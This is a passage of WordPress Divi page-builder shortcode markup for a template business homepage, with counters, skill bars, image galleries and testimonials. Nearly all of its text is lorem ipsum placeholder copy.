admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" 